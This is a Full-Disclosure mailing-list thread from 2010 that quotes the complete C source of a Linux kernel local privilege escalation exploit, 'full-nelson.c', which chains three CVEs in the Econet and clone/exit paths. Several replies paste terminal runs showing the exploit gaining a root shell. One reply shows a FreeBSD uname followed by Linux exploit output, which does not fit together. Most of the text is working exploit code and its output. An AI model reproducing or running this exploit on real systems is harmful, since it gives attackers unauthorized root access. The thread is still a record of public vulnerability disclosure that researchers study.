working here aswell ownst...@local[~]$ uname -a FreeBSD local 8.1-RELEASE-p1 FreeBSD 8.1-RELEASE-p1 #4: Thu Sep 23 08:30:18 UTC 2010 r...@benjir0x:/*usr*/*obj*/*usr*/*src*/*sys*/GENERIC amd64 ownst...@local[~]$ ./w00tw00t [*] Resolving kernel addresses... [+] Resolved econet_ioctl to 0xffffffffa0239510 [+] Resolved econet_ops to 0xffffffffa0239600 [+] Resolved commit_creds to 0xffffffff8108bd90 [+] Resolved prepare_kernel_cred to 0xffffffff8108c170 [*] Calculating target...
[*] Failed to set Econet address. [*] Triggering payload... [*] Got root! # id uid=0(root) gid=0(root) # On Wed, Dec 8, 2010 at 7:15 PM, leandro_lista <leandro_li...@portari.com.br>wrote: > Works in kernel 2.6.32-24 > > > > Linux indzin-desktop 2.6.32-24-generic #41-Ubuntu SMP Thu Aug 19 01:38:40 > UTC 2010 x86_64 GNU/Linux > > ind...@indzin-desktop:~$ ./nels > [*] Resolving kernel addresses... > [+] Resolved econet_ioctl to 0xffffffffa0239510 > [+] Resolved econet_ops to 0xffffffffa0239600 > [+] Resolved commit_creds to 0xffffffff8108bd90 > [+] Resolved prepare_kernel_cred to 0xffffffff8108c170 > [*] Calculating target... > > [*] Failed to set Econet address. > [*] Triggering payload... > [*] Got root! > # id > uid=0(root) gid=0(root) > # > > > :) > > > > > -----Original Message----- > *From*: Cal Leeming [Simplicity Media Ltd] < > cal.leem...@simplicitymedialtd.co.uk<%22cal%20leeming%20%5bsimplicity%20media%20ltd%5d%22%20%3ccal.leem...@simplicitymedialtd.co.uk%3e> > > > *Reply-to*: cal.leem...@simplicitymedialtd.co.uk > *To*: Dan Rosenberg > <dan.j.rosenb...@gmail.com<dan%20rosenberg%20%3cdan.j.rosenb...@gmail.com%3e> > > > *Cc*: full-disclosure@lists.grok.org.uk, bugt...@securityfocus.com > *Subject*: Re: [Full-disclosure] Linux kernel exploit > *Date*: Tue, 07 Dec 2010 21:06:44 +0000 > > Anyone tested this in sandbox yet? > > On 07/12/2010 20:25, Dan Rosenberg wrote: > > Hi all, > > > > I've included here a proof-of-concept local privilege escalation exploit > > for Linux. Please read the header for an explanation of what's going > > on. Without further ado, I present full-nelson.c: > > > > Happy hacking, > > Dan > > > > > > --snip-- > > > > /* > > * Linux Kernel<= 2.6.37 local privilege escalation > > * by Dan Rosenberg > > * @djrbliss on twitter > > * > > * Usage: > > * gcc full-nelson.c -o full-nelson > > * ./full-nelson > > * > > * This exploit leverages three vulnerabilities to get root, all of which > > were > > * discovered by Nelson Elhage: > > * > > * CVE-2010-4258 > > * ------------- > > * This is the interesting one, and the reason I wrote this exploit. If a > > * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a > > NULL > > * word will be written to a user-specified pointer when that thread exits. > > * This write is done using put_user(), which ensures the provided > > destination > > * resides in valid userspace by invoking access_ok(). However, Nelson > > * discovered that when the kernel performs an address limit override via > > * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page > > fault, > > * etc.), this override is not reverted before calling put_user() in the > > exit > > * path, allowing a user to write a NULL word to an arbitrary kernel > > address. > > * Note that this issue requires an additional vulnerability to trigger. > > * > > * CVE-2010-3849 > > * ------------- > > * This is a NULL pointer dereference in the Econet protocol. By itself, > > it's > > * fairly benign as a local denial-of-service. It's a perfect candidate to > > * trigger the above issue, since it's reachable via sock_no_sendpage(), > > which > > * subsequently calls sendmsg under KERNEL_DS. > > * > > * CVE-2010-3850 > > * ------------- > > * I wouldn't be able to reach the NULL pointer dereference and trigger the > > * OOPS if users weren't able to assign Econet addresses to arbitrary > > * interfaces due to a missing capabilities check. > > * > > * In the interest of public safety, this exploit was specifically > > designed to > > * be limited: > > * > > * * The particular symbols I resolve are not exported on Slackware or > > Debian > > * * Red Hat does not support Econet by default > > * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and > > * Debian > > * > > * However, the important issue, CVE-2010-4258, affects everyone, and it > > would > > * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly > > * more sophisticated version of this that doesn't have the roadblocks I > > put in > > * to prevent abuse by script kiddies. > > * > > * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64. > > * > > * NOTE: the exploit process will deadlock and stay in a zombie state > > after you > > * exit your root shell because the Econet thread OOPSes while holding the > > * Econet mutex. It wouldn't be too hard to fix this up, but I didn't > > bother. > > * > > * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla > > */ > > > > #include<stdio.h> > > #include<sys/socket.h> > > #include<fcntl.h> > > #include<sys/ioctl.h> > > #include<string.h> > > #include<net/if.h> > > #include<sched.h> > > #include<stdlib.h> > > #include<signal.h> > > #include<sys/utsname.h> > > #include<sys/mman.h> > > #include<unistd.h> > > > > /* How many bytes should we clear in our > > * function pointer to put it into userspace? */ > > #ifdef __x86_64__ > > #define SHIFT 24 > > #define OFFSET 3 > > #else > > #define SHIFT 8 > > #define OFFSET 1 > > #endif > > > > /* thanks spender... */ > > unsigned long get_kernel_sym(char *name) > > { > > FILE *f; > > unsigned long addr; > > char dummy; > > char sname[512]; > > struct utsname ver; > > int ret; > > int rep = 0; > > int oldstyle = 0; > > > > f = fopen("/proc/kallsyms", "r"); > > if (f == NULL) { > > f = fopen("/proc/ksyms", "r"); > > if (f == NULL) > > goto fallback; > > oldstyle = 1; > > } > > > > repeat: > > ret = 0; > > while(ret != EOF) { > > if (!oldstyle) > > ret = fscanf(f, "%p %c %s\n", (void **)&addr,&dummy, > > sname); > > else { > > ret = fscanf(f, "%p %s\n", (void **)&addr, sname); > > if (ret == 2) { > > char *p; > > if (strstr(sname, "_O/") || strstr(sname, > > "_S.")) > > continue; > > p = strrchr(sname, '_'); > > if (p> ((char *)sname + 5)&& !strncmp(p - 3, > > "smp", 3)) { > > p = p - 4; > > while (p> (char *)sname&& *(p - 1) == > > '_') > > p--; > > *p = '\0'; > > } > > } > > } > > if (ret == 0) { > > fscanf(f, "%s\n", sname); > > continue; > > } > > if (!strcmp(name, sname)) { > > fprintf(stdout, " [+] Resolved %s to %p%s\n", name, > > (void *)addr, rep ? " (via System.map)" : ""); > > fclose(f); > > return addr; > > } > > } > > > > fclose(f); > > if (rep) > > return 0; > > fallback: > > uname(&ver); > > if (strncmp(ver.release, "2.6", 3)) > > oldstyle = 1; > > sprintf(sname, "/boot/System.map-%s", ver.release); > > f = fopen(sname, "r"); > > if (f == NULL) > > return 0; > > rep = 1; > > goto repeat; > > } > > > > typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long > > cred); > > typedef unsigned long __attribute__((regparm(3))) (* > > _prepare_kernel_cred)(unsigned long cred); > > _commit_creds commit_creds; > > _prepare_kernel_cred prepare_kernel_cred; > > > > static int __attribute__((regparm(3))) > > getroot(void * file, void * vma) > > { > > > > commit_creds(prepare_kernel_cred(0)); > > return -1; > > > > } > > > > /* Why do I do this? Because on x86-64, the address of > > * commit_creds and prepare_kernel_cred are loaded relative > > * to rip, which means I can't just copy the above payload > > * into my landing area. */ > > void __attribute__((regparm(3))) > > trampoline() > > { > > > > #ifdef __x86_64__ > > asm("mov $getroot, %rax; call *%rax;"); > > #else > > asm("mov $getroot, %eax; call *%eax;"); > > #endif > > > > } > > > > /* Triggers a NULL pointer dereference in econet_sendmsg > > * via sock_no_sendpage, so it's under KERNEL_DS */ > > int trigger(int * fildes) > > { > > int ret; > > struct ifreq ifr; > > > > memset(&ifr, 0, sizeof(ifr)); > > strncpy(ifr.ifr_name, "eth0", IFNAMSIZ); > > > > ret = ioctl(fildes[2], SIOCSIFADDR,&ifr); > > > > if(ret< 0) { > > printf("[*] Failed to set Econet address.\n"); > > return -1; > > } > > > > splice(fildes[3], NULL, fildes[1], NULL, 128, 0); > > splice(fildes[0], NULL, fildes[2], NULL, 128, 0); > > > > /* Shouldn't get here... */ > > exit(0); > > } > > > > int main(int argc, char * argv[]) > > { > > unsigned long econet_ops, econet_ioctl, target, landing; > > int fildes[4], pid; > > void * newstack, * payload; > > > > /* Create file descriptors now so there are two > > references to them after cloning...otherwise > > the child will never return because it > > deadlocks when trying to unlock various > > mutexes after OOPSing */ > > pipe(fildes); > > fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0); > > fildes[3] = open("/dev/zero", O_RDONLY); > > > > if(fildes[0]< 0 || fildes[1]< 0 || fildes[2]< 0 || fildes[3]< 0) { > > printf("[*] Failed to open file descriptors.\n"); > > return -1; > > } > > > > /* Resolve addresses of relevant symbols */ > > printf("[*] Resolving kernel addresses...\n"); > > econet_ioctl = get_kernel_sym("econet_ioctl"); > > econet_ops = get_kernel_sym("econet_ops"); > > commit_creds = (_commit_creds) get_kernel_sym("commit_creds"); > > prepare_kernel_cred = (_prepare_kernel_cred) > > get_kernel_sym("prepare_kernel_cred"); > > > > if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || > > !econet_ops) { > > printf("[*] Failed to resolve kernel symbols.\n"); > > return -1; > > } > > > > if(!(newstack = malloc(65536))) { > > printf("[*] Failed to allocate memory.\n"); > > return -1; > > } > > > > printf("[*] Calculating target...\n"); > > target = econet_ops + 10 * sizeof(void *) - OFFSET; > > > > /* Clear the higher bits */ > > landing = econet_ioctl<< SHIFT>> SHIFT; > > > > payload = mmap((void *)(landing& ~0xfff), 2 * 4096, > > PROT_READ | PROT_WRITE | PROT_EXEC, > > MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); > > > > if ((long)payload == -1) { > > printf("[*] Failed to mmap() at target address.\n"); > > return -1; > > } > > > > memcpy((void *)landing,&trampoline, 1024); > > > > clone((int (*)(void *))trigger, > > (void *)((unsigned long)newstack + 65536), > > CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD, > > &fildes, NULL, NULL, target); > > > > sleep(1); > > > > printf("[*] Triggering payload...\n"); > > ioctl(fildes[2], 0, NULL); > > > > if(getuid()) { > > printf("[*] Exploit failed to get root.\n"); > > return -1; > > } > > > > printf("[*] Got root!\n"); > > execl("/bin/sh", "/bin/sh", NULL); > > } > > > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/